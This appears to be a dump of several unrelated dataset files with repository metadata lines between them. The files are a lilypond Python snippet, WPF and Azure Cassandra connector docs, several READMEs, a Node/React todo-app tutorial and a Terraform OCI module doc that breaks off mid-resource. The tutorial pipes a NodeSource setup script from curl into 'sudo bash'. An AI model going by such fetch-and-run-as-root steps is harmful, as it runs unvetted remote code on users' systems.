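def compile_score(src="score.ly", out="score_out", fmt=None, quiet=True):
    """Invoke lilypond with the flags documented above (illustrative only)."""
    cmd = ["lilypond", f"--output={out}"]
    if fmt:                      # e.g. "pdf", per the --formats option above
        cmd.append(f"--formats={fmt}")
    if quiet:                    # -s suppresses progress updates
        cmd.append("-s")
    cmd.append(src)
    subprocess.run(cmd, check=True)

compile_score("score.ly", out="score_out", fmt="pdf")
```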
44.709677
288
0.759019
eng_Latn
0.422273
5396291d1e920e4216d8ac83500d1842d20fb38a
987
md
Markdown
docs/framework/wpf/controls/tooltip-how-to-topics.md
skahack/docs.ja-jp
7f7fac4879f8509f582c3ee008776ae7d4dde227
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/framework/wpf/controls/tooltip-how-to-topics.md
skahack/docs.ja-jp
7f7fac4879f8509f582c3ee008776ae7d4dde227
[ "CC-BY-4.0", "MIT" ]
null
null
null
docs/framework/wpf/controls/tooltip-how-to-topics.md
skahack/docs.ja-jp
7f7fac4879f8509f582c3ee008776ae7d4dde227
[ "CC-BY-4.0", "MIT" ]
null
null
null
---
title: ToolTip How-to Topics
ms.date: 03/30/2017
f1_keywords:
  - AutoGeneratedOrientationPage
helpviewer_keywords:
  - ToolTip control [WPF], how-to topics
  - controls [WPF], ToolTip
ms.assetid: 2aa88347-c4cb-48d3-951d-a7072643283b
ms.openlocfilehash: eb2450d13b7a247e9eb0cc0b802b2d758482c466
ms.sourcegitcommit: 9b552addadfb57fab0b9e7852ed4f1f1b8a42f8e
ms.translationtype: MT
ms.contentlocale: ja-JP
ms.lasthandoff: 04/23/2019
ms.locfileid: "61790697"
---
# <a name="tooltip-how-to-topics"></a>ToolTip How-to Topics

## <a name="in-this-section"></a>In This Section

[Position a ToolTip](how-to-position-a-tooltip.md)
[Use the BetweenShowDelay Property](how-to-use-the-betweenshowdelay-property.md)

## <a name="reference"></a>Reference

<xref:System.Windows.Controls.ToolTip>
<xref:System.Windows.Controls.ToolTipService>
<xref:System.Windows.Controls.Primitives.Popup>

## <a name="related-sections"></a>Related Sections

[Popup Overview](popup-overview.md)
[How-to Topics](popup-how-to-topics.md)
29.909091
78
0.751773
yue_Hant
0.587515
53964c1ea277ba914982ddeb406f6552b54cb201
2,705
md
Markdown
README.md
xmlking/koa-router-decorators
fecd4c3f75e264fa42759265ff66e5cfea4b6784
[ "MIT" ]
56
2015-09-30T16:29:55.000Z
2021-07-04T20:20:53.000Z
README.md
xmlking/koa-router-decorators
fecd4c3f75e264fa42759265ff66e5cfea4b6784
[ "MIT" ]
1
2020-01-06T09:22:29.000Z
2020-01-07T07:34:42.000Z
README.md
xmlking/koa-router-decorators
fecd4c3f75e264fa42759265ff66e5cfea4b6784
[ "MIT" ]
16
2015-10-08T08:32:11.000Z
2019-07-31T10:39:05.000Z
# Koa Router Decorators

ES7 decorators for the koa-router model.

## Installation

```bash
$ npm i koa-router-decorators --save
```

## Usage

This library supports the [ES7 decorators proposal][decorators-url], which is supported by Babel and TypeScript.
To use it with Babel you should enable the experimental `es7.decorators` feature in Babel as described [here][babel-experimental-url].
To use it with TypeScript you should enable `experimentalDecorators` and `emitDecoratorMetadata` in `tsconfig.json`.

```
@route(path, HttpMethod, ...middleware)

optional middlewares are added before the target method.
```

See [trust-broker](https://github.com/xmlking/trust-broker) for more examples.

### Example

```js
import {route, HttpMethod} from 'koa-router-decorators';
import User from '../models/User'

@route('/users')
export default class UserController {
  router:Router;

  constructor() {
    return this.router.routes();
  }

  @route('/', HttpMethod.GET, isAdmin)
  static *index(next) {
    let query = User.find().skip(0).limit(20);
    let users = yield query.exec();
    let count = yield User.count();
    this.body = {users, count};
  }

  @route('/', HttpMethod.POST)
  static *create(next) {
    let newUser = new User(this.request.body);
    let result;
    try {
      result = yield newUser.save();
    } catch (err) {
      this.throw( 'DB Error: Unable to save', 500);
    }
    this.status = 201;
    this.body = result
  }
}

function *isAdmin(next) {
  if (!this.state.user.roles.includes('admin')) {
    throw new AuthorizationError(AuthorizationError.code.FORBIDDEN, {message: 'insufficient role (admin only)'});
  }
  yield next;
}
```

**Annotated routes are applied at the end. They may overwrite manually added routes if the path/method matches.**

```js
import koa from 'koa';
import Router from 'koa-router';
import bodyParser from'koa-bodyparser';
import UserController from './controllers/UserController';

rootRouter = new Router({
  prefix: '/api'
});
app = koa();
app.use(bodyParser());
app.use(new AuthController());
rootRouter.use('/v1', new UserController());
app
  .use(rootRouter.routes())
  .use(rootRouter.allowedMethods());
app.listen(3000);
```

### Development

You need TypeScript installed globally:

```bash
npm install -g typescript
npm install -g tslint
```

build

```bash
npm run compile # or just `tsc`
```

test

```bash
npm test
# bug: if you see an error, remove "pretest": "tsc -p ./test" from package.json and try again.
```

publish to npm registry

```bash
npm publish
```

[babel-url]: http://babeljs.io/
[decorators-url]: https://github.com/wycats/javascript-decorators
[babel-experimental-url]: https://babeljs.io/docs/usage/experimental/#usage
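The registration pattern behind `@route`, recording route metadata as handlers are declared and replaying the registry once at the end, is language-agnostic. The following Python analogue is illustrative only (the real library is JavaScript); the registry, names, and handlers are all hypothetical.

```python
# A minimal Python analogue of the @route decorator pattern described above
# (illustrative only; not this library's code).
ROUTES = []  # module-level registry filled in as handlers are declared

def route(path, method="GET", *middleware):
    def decorator(handler):
        ROUTES.append((method, path, middleware, handler))
        return handler
    return decorator

class UserController:
    @route("/users", "GET")
    def index(self):
        return {"users": [], "count": 0}

    @route("/users", "POST")
    def create(self):
        return {"created": True}

# "Annotated routes are applied at the end": the registry is replayed once,
# after all handlers are declared, which is why an annotated route can
# overwrite a manually added route with the same path/method.
for method, path, middleware, handler in ROUTES:
    print(method, path, handler.__name__)
```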
22.731092
130
0.692791
eng_Latn
0.796537
5396792f96a3d8d50c375190a95c4b690411e5a2
2,454
md
Markdown
plugins/cf-zsh-autocomplete-plugin_norman-abramovitz/README.md
withfig/plugins
199ee45c1cbab6e6e321182ff793f3240fee526f
[ "MIT" ]
19
2022-01-29T03:30:19.000Z
2022-03-30T07:04:08.000Z
plugins/cf-zsh-autocomplete-plugin_norman-abramovitz/README.md
withfig/plugins
199ee45c1cbab6e6e321182ff793f3240fee526f
[ "MIT" ]
4
2022-03-03T20:07:52.000Z
2022-03-30T19:27:39.000Z
plugins/cf-zsh-autocomplete-plugin_norman-abramovitz/README.md
withfig/plugins
199ee45c1cbab6e6e321182ff793f3240fee526f
[ "MIT" ]
3
2022-02-05T01:05:21.000Z
2022-03-24T16:56:55.000Z
# Cloud Foundry CLI zsh complete plugin

This [zsh](http://www.zsh.org/) plugin adds autocompletion options for all [Cloud Foundry CLI](http://docs.cloudfoundry.org/devguide/installcf/) commands.

## Demo

[![asciicast demo](https://asciinema.org/a/1twq9fo0bazyjtyiln88o9d0u.png)](https://asciinema.org/a/1twq9fo0bazyjtyiln88o9d0u) by [@shinji62](https://github.com/shinji62)

## Installation

* Download the latest version of the [Cloud Foundry CLI](https://github.com/cloudfoundry/cli#downloads)
* Follow the instructions for your plugin framework of choice:

### Oh-My-Zsh

* Clone this repo to your zsh plugins directory:

```
$ cd ~/.oh-my-zsh/plugins
$ git clone https://github.com/dannyzen/cf-zsh-autocomplete-plugin.git cf
```

* Add the `cf` plugin to your `.zshrc` file:

```
plugins=(... cf)
```

### Antigen, Antigen-hs, Antibody

```
antigen bundle dannyzen/cf-zsh-autocomplete-plugin
```

## Contributing

In the spirit of [free software](http://www.fsf.org/licensing/essays/free-sw.html), **everyone** is encouraged to help improve this project. Here are some ways *you* can contribute:

* by using alpha, beta, and prerelease versions
* by reporting bugs
* by suggesting new features
* by writing or editing documentation
* by writing specifications
* by writing code (**no patch is too small**: fix typos, add comments, clean up inconsistent whitespace)
* by refactoring code
* by closing [issues](https://github.com/dannyzen/cf-zsh-autocomplete-plugin/issues)
* by reviewing patches

### Submitting an Issue

We use the [GitHub issue tracker](https://github.com/dannyzen/cf-zsh-autocomplete-plugin/issues) to track bugs and features. Before submitting a bug report or feature request, check to make sure it hasn't already been submitted. You can indicate support for an existing issue by voting it up. When submitting a bug report, please include a [Gist](http://gist.github.com/) that includes a stack trace and any details that may be necessary to reproduce the bug, including your gem version, Ruby version, and operating system. Ideally, a bug report should include a pull request with failing specs.

### Submitting a Pull Request

1. Fork the project.
2. Create a topic branch.
3. Implement your feature or bug fix.
4. Commit and push your changes.
5. Submit a pull request.

## Copyright

Copyright (c) 2015 Ferran Rodenas. See [LICENSE](https://github.com/dannyzen/cf-zsh-autocomplete-plugin/blob/master/LICENSE) for details.
34.56338
169
0.756316
eng_Latn
0.953401
5396a59c63af85aaba24a9360138c6dc5081eb20
6,160
md
Markdown
Project3.md
Demiladee/Demilade-Project3
8f177bbed3decc9f6138848efc97013bd7f2244d
[ "MIT" ]
null
null
null
Project3.md
Demiladee/Demilade-Project3
8f177bbed3decc9f6138848efc97013bd7f2244d
[ "MIT" ]
null
null
null
Project3.md
Demiladee/Demilade-Project3
8f177bbed3decc9f6138848efc97013bd7f2244d
[ "MIT" ]
null
null
null
# Project 3

**Backend Configuration**

___

updating ubuntu

` $ sudo apt update`

![](images/updateubuntu1.png)

upgrading ubuntu

` $ sudo apt upgrade`

![](images/ubuntuupgrade2.png)

getting the nodejs location from the ubuntu repositories

` $ curl -sL https://deb.nodesource.com/setup_12.x | sudo -E bash -`

![](images/nodejslocation3.png)

installing nodejs & npm on the server

` $ sudo apt-get install -y nodejs`

verifying the node installation

` $ node -v`

verifying the npm installation

` $ npm -v`

![](images/installnverify4.png)

**application code setup**

creating a new directory for the todo project

` $ mkdir Todo`

verifying the todo directory

` $ ls`

changing directory to the newly created one

` $ cd Todo`

![](images/nwdirnchdir5.png)

initializing the project so package.json will be created

` $ npm init`

![](images/npminit6.png)

confirmation

![](images/confirmation7.png)

installing expressjs

` $ npm install express`

creating the index.js file

` $ touch index.js`

installing the dotenv module

` $ npm install dotenv`

opening the index.js file

` $ vim index.js`

![](images/express2vim8.png)

inside index.js

![](images/barebones9.png)

testing to see if the server works - it should work on port 5000

` $ node index.js`

![](images/nodeconf10.png)

opening TCP port 5000 in the EC2 security group

![](images/5000tcp11.png)

running public ip + port 5000

![](images/welcome2express12.png)

**routes**

creating the routes directory

` $ mkdir routes`

` $ cd routes`

create the api.js file

` $ touch api.js`

open the api.js file

` $ vi api.js`

![](images/routes2api13.png)

![](images/apibarebones14.png)

**models**

*installing mongoose - a nodejs package - that makes working with mongodb easier*

change directory back to the todo folder

` $ npm install mongoose`

create the models directory, cd into models and create the todo.js file

` $ mkdir models && cd models && touch todo.js`

open todo.js

` $ vim todo.js`

![](images/mongoose2vim15.png)

![](images/todojsvim16.png)

updating the code in the api.js file - within the routes directory

` $ cd routes`

` $ vim api.js`

![](images/chngroutes17.png)

**mongodb database**

creating the cluster

![](images/mongodbcluster18.png)

setting up network access

![](images/networkaccess19.png)

creating the mongodb database and collection inside mlab

![](images/demiladedatabase20.png)

going back to the todo directory to create the .env file to access environment variables

` $ touch .env`

` $ vi .env`

add this connection string to access the database

` $ DB = 'mongodb+srv://<username>:<password>@<network-address>/<dbname>?retryWrites=true&w=majority'`

updating index.js to reflect the use of .env so nodejs can connect to the database

` $ vim index.js`

delete the previous code and paste this:

```
const express = require('express');
const bodyParser = require('body-parser');
const mongoose = require('mongoose');
const routes = require('./routes/api');
const path = require('path');
require('dotenv').config();

const app = express();

const port = process.env.PORT || 5000;

//connect to the database
mongoose.connect(process.env.DB, { useNewUrlParser: true, useUnifiedTopology: true })
.then(() => console.log(`Database connected successfully`))
.catch(err => console.log(err));

//since mongoose promise is depreciated, we overide it with node's promise
mongoose.Promise = global.Promise;

app.use((req, res, next) => {
res.header("Access-Control-Allow-Origin", "\*");
res.header("Access-Control-Allow-Headers", "Origin, X-Requested-With, Content-Type, Accept");
next();
});

app.use(bodyParser.json());

app.use('/api', routes);

app.use((err, req, res, next) => {
console.log(err);
next();
});

app.listen(port, () => {
console.log(`Server running on port ${port}`)
});
```

start the server using:

` $ node index.js`

![](images/env2fixserver21.png)

##### Database connected successfully means the backend is configured

**testing the backend code without the frontend using a RESTful API**

I used Postman to test my API.

**POST request**

Header: Content-Type
Value: Application/json

![](images/POST22.png)

**GET request**

Header: Content-Type
Value: Application/json

![](images/GET23.png)

**DELETE request**

Header: Content-Type
Value: Application/json

![](images/DEL24.png)

**POST request again**

Header: Content-Type
Value: Application/json

![](images/POSTAGAIN25.png)

**frontend creation**

using the *create-react-app* command to scaffold the app

` $ npx create-react-app client`

![](images/reactclient26.png)

**running a react app**

installing concurrently

` $ npm install concurrently --save-dev`

installing nodemon

` $ npm install nodemon --save-dev`

open the package.json file and change a part of the code

![](images/conc2vi27.png)

![](images/changingjsoncode28.png)

**configuring the proxy in package.json**

changing directory to client

` $ cd client`

opening the package.json file

` $ vi package.json`

add the key-value pair to the file: "proxy": "http://localhost:5000"

![](images/localhost29.png)

go back to the todo directory and run:

` $ npm run dev`

the app should run on localhost:3000

![](images/rundev30.png)

to access the application via the internet I opened TCP port 3000 on EC2

![](images/3000port31.png)

**creating react components**

move to the src directory

` $ cd src`

create the components directory

` $ mkdir components`

` $ cd components`

create Input.js, ListTodo.js and Todo.js in components

` $ touch Input.js ListTodo.js Todo.js`

` $ vi Input.js`

move back to the client directory

` $ cd ..`

install axios

` $ npm install axios`

![](images/src2axios32.png)

![](images/indexjs33.png)

move to the components directory

` $ cd src/components`

open ListTodo.js

` $ vi ListTodo.js`

open Todo.js

` $ vi Todo.js`

adjusting the react code... deleting the logo and adjusting App.js

move back to the src directory

` $ cd ..`

open App.js

` $ vi App.js`

open App.css

` $ vi App.css`

open index.css

` $ vim index.css`

move back to the todo directory

` $ cd ../..`

in the todo directory run:

` $ npm run dev`

![](images/src2rundev34.png)

![](images/listtodo35.png)

![](images/vitodo36.png)

![](images/appjs37.png)

![](images/appcss38.png)

![](images/indexcss39.png)

![](images/final40.png)
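As an alternative to the Postman checks above, the same POST/GET/DELETE requests can be scripted. This Python sketch assumes the Express routes from api.js are mounted at `/api/todos` (the usual layout for this tutorial); the base URL, the route path, and the response shapes are assumptions, so adjust them to match your own routes file.

```python
import requests  # pip install requests

BASE = "http://localhost:5000/api/todos"  # assumed route; check routes/api.js

# POST: create a todo (Content-Type: application/json, as in the Postman test)
created = requests.post(BASE, json={"action": "buy groceries"})
print(created.status_code, created.json())

# GET: list todos (assumed to return a JSON array)
todos = requests.get(BASE).json()
print(todos)

# DELETE: remove the first todo by id, mirroring the DELETE request above
if todos:
    first_id = todos[0]["_id"]  # MongoDB documents carry an _id field
    deleted = requests.delete(f"{BASE}/{first_id}")
    print(deleted.status_code)
```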
15.6743
102
0.707143
eng_Latn
0.665312
53977786dc7614fba257b833bfe5e9c155677360
12,975
md
Markdown
articles/data-factory/connector-cassandra.md
BaherAbdullah/azure-docs
65d82440dd3209697fdb983ef456b0a2293e270a
[ "CC-BY-4.0", "MIT" ]
null
null
null
articles/data-factory/connector-cassandra.md
BaherAbdullah/azure-docs
65d82440dd3209697fdb983ef456b0a2293e270a
[ "CC-BY-4.0", "MIT" ]
null
null
null
articles/data-factory/connector-cassandra.md
BaherAbdullah/azure-docs
65d82440dd3209697fdb983ef456b0a2293e270a
[ "CC-BY-4.0", "MIT" ]
null
null
null
---
title: Copy data from Cassandra using Azure Data Factory
titleSuffix: Azure Data Factory & Azure Synapse
description: Learn how to copy data from Cassandra to supported sink data stores by using a copy activity in an Azure Data Factory pipeline.
author: jianleishen
ms.service: data-factory
ms.subservice: data-movement
ms.custom: synapse
ms.topic: conceptual
ms.date: 08/30/2021
ms.author: jianleishen
---

# Copy data from Cassandra using Azure Data Factory

> [!div class="op_single_selector" title1="Select the version of Data Factory service you are using:"]
> * [Version 1](v1/data-factory-onprem-cassandra-connector.md)
> * [Current version](connector-cassandra.md)

[!INCLUDE[appliesto-adf-asa-md](includes/appliesto-adf-asa-md.md)]

This article outlines how to use the Copy Activity in Azure Data Factory to copy data from a Cassandra database. It builds on the [copy activity overview](copy-activity-overview.md) article that presents a general overview of copy activity.

## Supported capabilities

This Cassandra connector is supported for the following activities:

- [Copy activity](copy-activity-overview.md) with [supported source/sink matrix](copy-activity-overview.md)
- [Lookup activity](control-flow-lookup-activity.md)

You can copy data from Cassandra database to any supported sink data store. For a list of data stores that are supported as sources/sinks by the copy activity, see the [Supported data stores](copy-activity-overview.md#supported-data-stores-and-formats) table.

Specifically, this Cassandra connector supports:

- Cassandra **versions 2.x and 3.x**.
- Copying data using **Basic** or **Anonymous** authentication.

>[!NOTE]
>For activity running on Self-hosted Integration Runtime, Cassandra 3.x is supported since IR version 3.7 and above.

## Prerequisites

[!INCLUDE [data-factory-v2-integration-runtime-requirements](includes/data-factory-v2-integration-runtime-requirements.md)]

The Integration Runtime provides a built-in Cassandra driver, therefore you don't need to manually install any driver when copying data from/to Cassandra.

## Getting started

[!INCLUDE [data-factory-v2-connector-get-started](includes/data-factory-v2-connector-get-started.md)]

## Create a linked service to Cassandra using UI

Use the following steps to create a linked service to Cassandra in the Azure portal UI.

1. Browse to the Manage tab in your Azure Data Factory or Synapse workspace and select Linked Services, then click New:

    # [Azure Data Factory](#tab/data-factory)

    :::image type="content" source="media/doc-common-process/new-linked-service.png" alt-text="Screenshot of creating a new linked service with Azure Data Factory UI.":::

    # [Azure Synapse](#tab/synapse-analytics)

    :::image type="content" source="media/doc-common-process/new-linked-service-synapse.png" alt-text="Screenshot of creating a new linked service with Azure Synapse UI.":::

2. Search for Cassandra and select the Cassandra connector.

    :::image type="content" source="media/connector-cassandra/cassandra-connector.png" alt-text="Screenshot of the Cassandra connector.":::

1. Configure the service details, test the connection, and create the new linked service.

    :::image type="content" source="media/connector-cassandra/configure-cassandra-linked-service.png" alt-text="Screenshot of linked service configuration for Cassandra.":::

## Connector configuration details

The following sections provide details about properties that are used to define Data Factory entities specific to Cassandra connector.

## Linked service properties

The following properties are supported for Cassandra linked service:

| Property | Description | Required |
|:--- |:--- |:--- |
| type |The type property must be set to: **Cassandra** |Yes |
| host |One or more IP addresses or host names of Cassandra servers.<br/>Specify a comma-separated list of IP addresses or host names to connect to all servers concurrently. |Yes |
| port |The TCP port that the Cassandra server uses to listen for client connections. |No (default is 9042) |
| authenticationType | Type of authentication used to connect to the Cassandra database.<br/>Allowed values are: **Basic**, and **Anonymous**. |Yes |
| username |Specify user name for the user account. |Yes, if authenticationType is set to Basic. |
| password |Specify password for the user account. Mark this field as a SecureString to store it securely in Data Factory, or [reference a secret stored in Azure Key Vault](store-credentials-in-key-vault.md). |Yes, if authenticationType is set to Basic. |
| connectVia | The [Integration Runtime](concepts-integration-runtime.md) to be used to connect to the data store. Learn more from [Prerequisites](#prerequisites) section. If not specified, it uses the default Azure Integration Runtime. |No |

>[!NOTE]
>Currently connection to Cassandra using TLS is not supported.

**Example:**

```json
{
    "name": "CassandraLinkedService",
    "properties": {
        "type": "Cassandra",
        "typeProperties": {
            "host": "<host>",
            "authenticationType": "Basic",
            "username": "<username>",
            "password": {
                "type": "SecureString",
                "value": "<password>"
            }
        },
        "connectVia": {
            "referenceName": "<name of Integration Runtime>",
            "type": "IntegrationRuntimeReference"
        }
    }
}
```

## Dataset properties

For a full list of sections and properties available for defining datasets, see the [datasets](concepts-datasets-linked-services.md) article. This section provides a list of properties supported by Cassandra dataset.

To copy data from Cassandra, set the type property of the dataset to **CassandraTable**. The following properties are supported:

| Property | Description | Required |
|:--- |:--- |:--- |
| type | The type property of the dataset must be set to: **CassandraTable** | Yes |
| keyspace |Name of the keyspace or schema in Cassandra database. |No (if "query" for "CassandraSource" is specified) |
| tableName |Name of the table in Cassandra database. |No (if "query" for "CassandraSource" is specified) |

**Example:**

```json
{
    "name": "CassandraDataset",
    "properties": {
        "type": "CassandraTable",
        "typeProperties": {
            "keySpace": "<keyspace name>",
            "tableName": "<table name>"
        },
        "schema": [],
        "linkedServiceName": {
            "referenceName": "<Cassandra linked service name>",
            "type": "LinkedServiceReference"
        }
    }
}
```

## Copy activity properties

For a full list of sections and properties available for defining activities, see the [Pipelines](concepts-pipelines-activities.md) article. This section provides a list of properties supported by Cassandra source.

### Cassandra as source

To copy data from Cassandra, set the source type in the copy activity to **CassandraSource**. The following properties are supported in the copy activity **source** section:

| Property | Description | Required |
|:--- |:--- |:--- |
| type | The type property of the copy activity source must be set to: **CassandraSource** | Yes |
| query |Use the custom query to read data. SQL-92 query or CQL query. See [CQL reference](https://docs.datastax.com/en/cql/3.1/cql/cql_reference/cqlReferenceTOC.html).<br/><br/>When using SQL query, specify **keyspace name.table name** to represent the table you want to query. |No (if "tableName" and "keyspace" in dataset are specified). |
| consistencyLevel |The consistency level specifies how many replicas must respond to a read request before returning data to the client application. Cassandra checks the specified number of replicas for data to satisfy the read request. See [Configuring data consistency](https://docs.datastax.com/en/cassandra/2.1/cassandra/dml/dml_config_consistency_c.html) for details.<br/><br/>Allowed values are: **ONE**, **TWO**, **THREE**, **QUORUM**, **ALL**, **LOCAL_QUORUM**, **EACH_QUORUM**, and **LOCAL_ONE**. |No (default is `ONE`) |

**Example:**

```json
"activities":[
    {
        "name": "CopyFromCassandra",
        "type": "Copy",
        "inputs": [
            {
                "referenceName": "<Cassandra input dataset name>",
                "type": "DatasetReference"
            }
        ],
        "outputs": [
            {
                "referenceName": "<output dataset name>",
                "type": "DatasetReference"
            }
        ],
        "typeProperties": {
            "source": {
                "type": "CassandraSource",
                "query": "select id, firstname, lastname from mykeyspace.mytable"
            },
            "sink": {
                "type": "<sink type>"
            }
        }
    }
]
```

## Data type mapping for Cassandra

When copying data from Cassandra, the following mappings are used from Cassandra data types to Azure Data Factory interim data types. See [Schema and data type mappings](copy-activity-schema-and-type-mapping.md) to learn about how copy activity maps the source schema and data type to the sink.

| Cassandra data type | Data factory interim data type |
|:--- |:--- |
| ASCII |String |
| BIGINT |Int64 |
| BLOB |Byte[] |
| BOOLEAN |Boolean |
| DECIMAL |Decimal |
| DOUBLE |Double |
| FLOAT |Single |
| INET |String |
| INT |Int32 |
| TEXT |String |
| TIMESTAMP |DateTime |
| TIMEUUID |Guid |
| UUID |Guid |
| VARCHAR |String |
| VARINT |Decimal |

> [!NOTE]
> For collection types (map, set, list, etc.), refer to [Work with Cassandra collection types using virtual table](#work-with-collections-using-virtual-table) section.
>
> User-defined types are not supported.
>
> The length of Binary Column and String Column lengths cannot be greater than 4000.
>

## Work with collections using virtual table

Azure Data Factory uses a built-in ODBC driver to connect to and copy data from your Cassandra database. For collection types including map, set and list, the driver renormalizes the data into corresponding virtual tables. Specifically, if a table contains any collection columns, the driver generates the following virtual tables:

* A **base table**, which contains the same data as the real table except for the collection columns. The base table uses the same name as the real table that it represents.
* A **virtual table** for each collection column, which expands the nested data. The virtual tables that represent collections are named using the name of the real table, a separator "*vt*" and the name of the column.

Virtual tables refer to the data in the real table, enabling the driver to access the denormalized data. See Example section for details. You can access the content of Cassandra collections by querying and joining the virtual tables.

### Example

For example, the following "ExampleTable" is a Cassandra database table that contains an integer primary key column named "pk_int", a text column named value, a list column, a map column, and a set column (named "StringSet").

| pk_int | Value | List | Map | StringSet |
| --- | --- | --- | --- | --- |
| 1 |"sample value 1" |["1", "2", "3"] |{"S1": "a", "S2": "b"} |{"A", "B", "C"} |
| 3 |"sample value 3" |["100", "101", "102", "105"] |{"S1": "t"} |{"A", "E"} |

The driver would generate multiple virtual tables to represent this single table. The foreign key columns in the virtual tables reference the primary key columns in the real table, and indicate which real table row the virtual table row corresponds to.

The first virtual table is the base table named "ExampleTable" and is shown in the following table:

| pk_int | Value |
| --- | --- |
| 1 |"sample value 1" |
| 3 |"sample value 3" |

The base table contains the same data as the original database table except for the collections, which are omitted from this table and expanded in other virtual tables.

The following tables show the virtual tables that renormalize the data from the List, Map, and StringSet columns. The columns with names that end with "_index" or "_key" indicate the position of the data within the original list or map. The columns with names that end with "_value" contain the expanded data from the collection.

**Table "ExampleTable_vt_List":**

| pk_int | List_index | List_value |
| --- | --- | --- |
| 1 |0 |1 |
| 1 |1 |2 |
| 1 |2 |3 |
| 3 |0 |100 |
| 3 |1 |101 |
| 3 |2 |102 |
| 3 |3 |105 |

**Table "ExampleTable_vt_Map":**

| pk_int | Map_key | Map_value |
| --- | --- | --- |
| 1 |S1 |a |
| 1 |S2 |b |
| 3 |S1 |t |

**Table "ExampleTable_vt_StringSet":**

| pk_int | StringSet_value |
| --- | --- |
| 1 |A |
| 1 |B |
| 1 |C |
| 3 |A |
| 3 |E |

## Lookup activity properties

To learn details about the properties, check [Lookup activity](control-flow-lookup-activity.md).

## Next steps

For a list of data stores supported as sources and sinks by the copy activity in Azure Data Factory, see [supported data stores](copy-activity-overview.md#supported-data-stores-and-formats).
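Returning to the virtual-table example above: the renormalization the driver performs can be made concrete with a short, illustrative Python sketch. This is not the ODBC driver's actual code; it simply expands a row with collection columns into the base row plus the `_vt_` rows shown in the example tables.

```python
def renormalize(row, pk="pk_int"):
    """Split one Cassandra row into a base row plus virtual-table rows."""
    base, virtual = {}, {}
    for column, value in row.items():
        if isinstance(value, list):          # list -> _vt_<col> with <col>_index
            virtual[f"vt_{column}"] = [
                {pk: row[pk], f"{column}_index": i, f"{column}_value": v}
                for i, v in enumerate(value)]
        elif isinstance(value, dict):        # map -> _vt_<col> with <col>_key
            virtual[f"vt_{column}"] = [
                {pk: row[pk], f"{column}_key": k, f"{column}_value": v}
                for k, v in value.items()]
        elif isinstance(value, set):         # set -> _vt_<col> with <col>_value
            virtual[f"vt_{column}"] = [
                {pk: row[pk], f"{column}_value": v} for v in sorted(value)]
        else:
            base[column] = value             # scalars stay in the base table
    return base, virtual

row = {"pk_int": 1, "Value": "sample value 1", "List": ["1", "2", "3"],
       "Map": {"S1": "a", "S2": "b"}, "StringSet": {"A", "B", "C"}}
base, virtual = renormalize(row)
print(base)                # the base-table row
print(virtual["vt_List"])  # rows for ExampleTable_vt_List
```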
44.283276
531
0.70343
eng_Latn
0.968641
5397a6296c63e6385c082b6b0010e525abd429c7
476
markdown
Markdown
README.markdown
btedev/comma
96b067e4b246b8e79011b225a88beb2d7ded135d
[ "MIT" ]
1
2016-05-09T12:26:50.000Z
2016-05-09T12:26:50.000Z
README.markdown
btedev/comma
96b067e4b246b8e79011b225a88beb2d7ded135d
[ "MIT" ]
null
null
null
README.markdown
btedev/comma
96b067e4b246b8e79011b225a88beb2d7ded135d
[ "MIT" ]
null
null
null
= COMMA [http://github.com/btedev/comma](http://github.com/btedev/comma)

== DESCRIPTION:

Please read the full documentation of crafterm's Comma at [http://github.com/crafterm/comma](http://github.com/crafterm/comma)

The original library exports the file using the method name for the filename, with no extension. btedev added the ability to customize the filename as such:

    render :csv => contracts, :filename => "transactions.csv"

If no :filename is specified, the default is "report.csv"
31.733333
143
0.762605
eng_Latn
0.860737
53980311d738987c1e84c0eded92b782dbf8b8f3
6,112
md
Markdown
oci/r/oci_core_ipsec_connection_tunnel_management.md
chrisjaimon2012/tfwriter
1ea629ed386bbe6a8f21617a430dae19ba536a98
[ "MIT" ]
78
2021-01-15T14:10:30.000Z
2022-02-14T09:17:40.000Z
oci/r/oci_core_ipsec_connection_tunnel_management.md
chrisjaimon2012/tfwriter
1ea629ed386bbe6a8f21617a430dae19ba536a98
[ "MIT" ]
5
2021-04-09T15:21:28.000Z
2022-01-28T19:02:05.000Z
oci/r/oci_core_ipsec_connection_tunnel_management.md
chrisjaimon2012/tfwriter
1ea629ed386bbe6a8f21617a430dae19ba536a98
[ "MIT" ]
30
2021-01-17T13:16:57.000Z
2022-03-21T12:52:08.000Z
# oci_core_ipsec_connection_tunnel_management

[back](../oci.md)

### Index

- [Example Usage](#example-usage)
- [Variables](#variables)
- [Resource](#resource)
- [Outputs](#outputs)

### Terraform

```terraform
terraform {
  required_providers {
    oci = ">= 4.21.0"
  }
}
```

[top](#index)

### Example Usage

```terraform
module "oci_core_ipsec_connection_tunnel_management" {
  source = "./modules/oci/r/oci_core_ipsec_connection_tunnel_management"

  # display_name - (optional) is a type of string
  display_name = null
  # ike_version - (optional) is a type of string
  ike_version = null
  # ipsec_id - (required) is a type of string
  ipsec_id = null
  # routing - (required) is a type of string
  routing = null
  # shared_secret - (optional) is a type of string
  shared_secret = null
  # tunnel_id - (required) is a type of string
  tunnel_id = null

  bgp_session_info = [{
    bgp_state             = null
    customer_bgp_asn      = null
    customer_interface_ip = null
    oracle_bgp_asn        = null
    oracle_interface_ip   = null
  }]

  encryption_domain_config = [{
    cpe_traffic_selector    = []
    oracle_traffic_selector = []
  }]

  timeouts = [{
    create = null
    delete = null
    update = null
  }]
}
```

[top](#index)

### Variables

```terraform
variable "display_name" {
  description = "(optional)"
  type        = string
  default     = null
}

variable "ike_version" {
  description = "(optional)"
  type        = string
  default     = null
}

variable "ipsec_id" {
  description = "(required)"
  type        = string
}

variable "routing" {
  description = "(required)"
  type        = string
}

variable "shared_secret" {
  description = "(optional)"
  type        = string
  default     = null
}

variable "tunnel_id" {
  description = "(required)"
  type        = string
}

variable "bgp_session_info" {
  description = "nested block: NestingList, min items: 0, max items: 0"
  type = set(object(
    {
      bgp_state             = string
      customer_bgp_asn      = string
      customer_interface_ip = string
      oracle_bgp_asn        = string
      oracle_interface_ip   = string
    }
  ))
  default = []
}

variable "encryption_domain_config" {
  description = "nested block: NestingList, min items: 0, max items: 1"
  type = set(object(
    {
      cpe_traffic_selector    = list(string)
      oracle_traffic_selector = list(string)
    }
  ))
  default = []
}

variable "timeouts" {
  description = "nested block: NestingSingle, min items: 0, max items: 0"
  type = set(object(
    {
      create = string
      delete = string
      update = string
    }
  ))
  default = []
}
```

[top](#index)

### Resource

```terraform
resource "oci_core_ipsec_connection_tunnel_management" "this" {
  # display_name - (optional) is a type of string
  display_name = var.display_name
  # ike_version - (optional) is a type of string
  ike_version = var.ike_version
